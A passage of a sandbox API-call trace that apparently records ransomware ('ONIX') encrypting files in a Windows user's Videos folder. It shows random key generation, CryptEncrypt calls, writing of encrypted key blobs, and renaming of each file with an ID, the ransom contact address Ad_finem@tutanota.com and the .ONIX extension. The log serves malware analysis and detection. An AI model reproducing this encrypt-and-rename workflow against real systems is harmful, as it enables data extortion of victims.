(lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\BcD-2GJTf.avi", dwFileAttributes=0x80) returned 1 [0121.616] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\BcD-2GJTf.avi") returned 51 [0121.616] GetProcessHeap () returned 0x410000 [0121.616] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xd6) returned 0x44faf8 [0121.616] lstrcpyW (in: lpString1=0x44faf8, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\BcD-2GJTf.avi" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\BcD-2GJTf.avi") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\BcD-2GJTf.avi" [0121.616] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\BcD-2GJTf.avi", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\BcD-2GJTf.avi.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\BcD-2GJTf.avi.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0121.616] GetFileSizeEx (in: hFile=0x4c8, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=73957) returned 1 [0121.616] SetFilePointer (in: hFile=0x4c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x120e5 [0121.616] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0121.616] GetProcessHeap () returned 0x410000 [0121.616] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8e98 [0121.616] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x100) returned 1 [0121.618] WriteFile (in: hFile=0x4c8, lpBuffer=0x4d8e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8e98*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0121.619] WriteFile (in: hFile=0x4c8, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0121.620] WriteFile (in: hFile=0x4c8, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0121.621] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x120e5) returned 0xf50048 [0121.622] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x120e5) returned 0xf62138 [0121.622] SetFilePointer (in: hFile=0x4c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.622] ReadFile (in: hFile=0x4c8, lpBuffer=0xf50048, nNumberOfBytesToRead=0x120e5, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0xf50048*, lpNumberOfBytesRead=0x367f44c*=0x120e5, lpOverlapped=0x0) returned 1 [0121.625] UnlockFile (hFile=0x4c8, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x120e5, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0121.625] CloseHandle (hObject=0x4c8) returned 1 [0121.626] GetProcessHeap () returned 0x410000 [0121.626] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8e98 | out: hHeap=0x410000) returned 1 [0121.626] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\BcD-2GJTf.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\bcd-2gjtf.avi"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\BcD-2GJTf.avi.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\bcd-2gjtf.avi.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0121.628] GetProcessHeap () returned 0x410000 [0121.628] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x44faf8 | out: hHeap=0x410000) returned 1 [0121.628] FindNextFileW (in: hFindFile=0x48eff0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0121.628] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\desktop.ini"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x4c8 [0121.629] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0121.629] LockFile (hFile=0x4c8, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x1f8, nNumberOfBytesToLockHigh=0x0) returned 1 [0121.629] SetFilePointerEx (in: hFile=0x4c8, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0121.629] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0121.629] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8d90 | out: pbBuffer=0x4d8d90) returned 1 [0121.629] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b27a0 | out: pbBuffer=0x4b27a0) returned 1 [0121.629] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\desktop.ini", dwFileAttributes=0x80) returned 1 [0121.629] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\desktop.ini") returned 49 [0121.629] GetProcessHeap () returned 0x410000 [0121.629] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xd2) returned 0x44faf8 [0121.629] lstrcpyW (in: lpString1=0x44faf8, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\desktop.ini" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\desktop.ini") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\desktop.ini" [0121.629] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\desktop.ini", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\desktop.ini.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\desktop.ini.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0121.629] GetFileSizeEx (in: hFile=0x4c8, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=504) returned 1 [0121.629] SetFilePointer (in: hFile=0x4c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x1f8 [0121.630] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0121.630] GetProcessHeap () returned 0x410000 [0121.630] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8e98 [0121.630] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x100) returned 1 [0121.631] WriteFile (in: hFile=0x4c8, lpBuffer=0x4d8e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8e98*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0121.634] WriteFile (in: hFile=0x4c8, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0121.635] WriteFile (in: hFile=0x4c8, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0121.636] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x1f8) returned 0x442938 [0121.636] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x1f8) returned 0x46a0f0 [0121.636] SetFilePointer (in: hFile=0x4c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.636] ReadFile (in: hFile=0x4c8, lpBuffer=0x442938, nNumberOfBytesToRead=0x1f8, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x442938*, lpNumberOfBytesRead=0x367f44c*=0x1f8, lpOverlapped=0x0) returned 1 [0121.636] SetFilePointer (in: hFile=0x4c8, lDistanceToMove=-504, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.636] WriteFile (in: hFile=0x4c8, lpBuffer=0x46a0f0*, nNumberOfBytesToWrite=0x1f8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x46a0f0*, lpNumberOfBytesWritten=0x367f44c*=0x1f8, lpOverlapped=0x0) returned 1 [0121.639] UnlockFile (hFile=0x4c8, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x1f8, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0121.639] CloseHandle (hObject=0x4c8) returned 1 [0121.639] GetProcessHeap () returned 0x410000 [0121.639] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8e98 | out: hHeap=0x410000) returned 1 [0121.639] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\desktop.ini"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\desktop.ini.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\desktop.ini.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0121.641] GetProcessHeap () returned 0x410000 [0121.641] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x44faf8 | out: hHeap=0x410000) returned 1 [0121.641] FindNextFileW (in: hFindFile=0x48eff0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6d4c3770, ftCreationTime.dwHighDateTime=0x1d5db91, ftLastAccessTime.dwLowDateTime=0xd85b7f20, ftLastAccessTime.dwHighDateTime=0x1d5e61e, ftLastWriteTime.dwLowDateTime=0xd85b7f20, ftLastWriteTime.dwHighDateTime=0x1d5e61e, nFileSizeHigh=0x0, nFileSizeLow=0xc515, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DM n.avi", cAlternateFileName="DMN~1.AVI")) returned 1 [0121.641] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DM n.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\dm n.avi"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x4c8 [0121.641] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0121.641] LockFile (hFile=0x4c8, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0xc515, nNumberOfBytesToLockHigh=0x0) returned 1 [0121.642] SetFilePointerEx (in: hFile=0x4c8, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0121.642] ReadFile (in: hFile=0x4c8, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0121.642] SetFilePointerEx (in: hFile=0x4c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.642] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0121.643] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8d90 | out: pbBuffer=0x4d8d90) returned 1 [0121.643] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b27a0 | out: pbBuffer=0x4b27a0) returned 1 [0121.643] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DM n.avi", dwFileAttributes=0x80) returned 1 [0121.643] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DM n.avi") returned 46 [0121.643] GetProcessHeap () returned 0x410000 [0121.643] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xcc) returned 0x477600 [0121.643] lstrcpyW (in: lpString1=0x477600, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DM n.avi" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DM n.avi") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DM n.avi" [0121.643] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DM n.avi", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DM n.avi.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DM n.avi.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0121.643] GetFileSizeEx (in: hFile=0x4c8, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=50453) returned 1 [0121.643] SetFilePointer (in: hFile=0x4c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0xc515 [0121.643] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0121.643] GetProcessHeap () returned 0x410000 [0121.643] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8e98 [0121.643] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x100) returned 1 [0121.643] WriteFile (in: hFile=0x4c8, lpBuffer=0x4d8e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8e98*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0121.645] WriteFile (in: hFile=0x4c8, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0121.646] WriteFile (in: hFile=0x4c8, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0121.647] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xc515) returned 0x4dcb68 [0121.647] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xc515) returned 0xf50048 [0121.648] SetFilePointer (in: hFile=0x4c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.648] ReadFile (in: hFile=0x4c8, lpBuffer=0x4dcb68, nNumberOfBytesToRead=0xc515, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4dcb68*, lpNumberOfBytesRead=0x367f44c*=0xc515, lpOverlapped=0x0) returned 1 [0121.650] UnlockFile (hFile=0x4c8, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0xc515, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0121.650] CloseHandle (hObject=0x4c8) returned 1 [0121.651] GetProcessHeap () returned 0x410000 [0121.651] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8e98 | out: hHeap=0x410000) returned 1 [0121.651] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DM n.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\dm n.avi"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DM n.avi.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\dm n.avi.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0121.653] GetProcessHeap () returned 0x410000 [0121.653] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x477600 | out: hHeap=0x410000) returned 1 [0121.653] FindNextFileW (in: hFindFile=0x48eff0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3efa9030, ftCreationTime.dwHighDateTime=0x1d5de3c, ftLastAccessTime.dwLowDateTime=0xe370be60, ftLastAccessTime.dwHighDateTime=0x1d5e449, ftLastWriteTime.dwLowDateTime=0xe370be60, ftLastWriteTime.dwHighDateTime=0x1d5e449, nFileSizeHigh=0x0, nFileSizeLow=0x129e1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="E5Wkjmd-o99.flv", cAlternateFileName="E5WKJM~1.FLV")) returned 1 [0121.653] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\E5Wkjmd-o99.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\e5wkjmd-o99.flv"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x4c8 [0121.653] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0121.653] LockFile (hFile=0x4c8, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x129e1, nNumberOfBytesToLockHigh=0x0) returned 1 [0121.653] SetFilePointerEx (in: hFile=0x4c8, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0121.653] ReadFile (in: hFile=0x4c8, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0121.654] SetFilePointerEx (in: hFile=0x4c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.654] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0121.654] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8d90 | out: pbBuffer=0x4d8d90) returned 1 [0121.654] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b27a0 | out: pbBuffer=0x4b27a0) returned 1 [0121.654] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\E5Wkjmd-o99.flv", dwFileAttributes=0x80) returned 1 [0121.655] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\E5Wkjmd-o99.flv") returned 53 [0121.655] GetProcessHeap () returned 0x410000 [0121.655] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xda) returned 0x44faf8 [0121.655] lstrcpyW (in: lpString1=0x44faf8, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\E5Wkjmd-o99.flv" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\E5Wkjmd-o99.flv") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\E5Wkjmd-o99.flv" [0121.655] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\E5Wkjmd-o99.flv", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\E5Wkjmd-o99.flv.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\E5Wkjmd-o99.flv.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0121.655] GetFileSizeEx (in: hFile=0x4c8, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=76257) returned 1 [0121.655] SetFilePointer (in: hFile=0x4c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x129e1 [0121.655] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0121.655] GetProcessHeap () returned 0x410000 [0121.655] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8e98 [0121.655] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x100) returned 1 [0121.656] WriteFile (in: hFile=0x4c8, lpBuffer=0x4d8e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8e98*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0121.658] WriteFile (in: hFile=0x4c8, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0121.659] WriteFile (in: hFile=0x4c8, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0121.660] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x129e1) returned 0xf50048 [0121.661] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x129e1) returned 0xf62a38 [0121.661] SetFilePointer (in: hFile=0x4c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.661] ReadFile (in: hFile=0x4c8, lpBuffer=0xf50048, nNumberOfBytesToRead=0x129e1, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0xf50048*, lpNumberOfBytesRead=0x367f44c*=0x129e1, lpOverlapped=0x0) returned 1 [0121.664] UnlockFile (hFile=0x4c8, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x129e1, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0121.664] CloseHandle (hObject=0x4c8) returned 1 [0121.665] GetProcessHeap () returned 0x410000 [0121.665] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8e98 | out: hHeap=0x410000) returned 1 [0121.665] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\E5Wkjmd-o99.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\e5wkjmd-o99.flv"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\E5Wkjmd-o99.flv.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\e5wkjmd-o99.flv.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0121.670] GetProcessHeap () returned 0x410000 [0121.670] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x44faf8 | out: hHeap=0x410000) returned 1 [0121.670] FindNextFileW (in: hFindFile=0x48eff0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x75109e0, ftCreationTime.dwHighDateTime=0x1d5e3a8, ftLastAccessTime.dwLowDateTime=0xf45d3f60, ftLastAccessTime.dwHighDateTime=0x1d5de1c, ftLastWriteTime.dwLowDateTime=0xf45d3f60, ftLastWriteTime.dwHighDateTime=0x1d5de1c, nFileSizeHigh=0x0, nFileSizeLow=0x12eab, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ExfnGRMLv.mkv", cAlternateFileName="EXFNGR~1.MKV")) returned 1 [0121.670] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ExfnGRMLv.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\exfngrmlv.mkv"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x4c8 [0121.670] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0121.670] LockFile (hFile=0x4c8, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x12eab, nNumberOfBytesToLockHigh=0x0) returned 1 [0121.670] SetFilePointerEx (in: hFile=0x4c8, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0121.671] ReadFile (in: hFile=0x4c8, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0121.671] 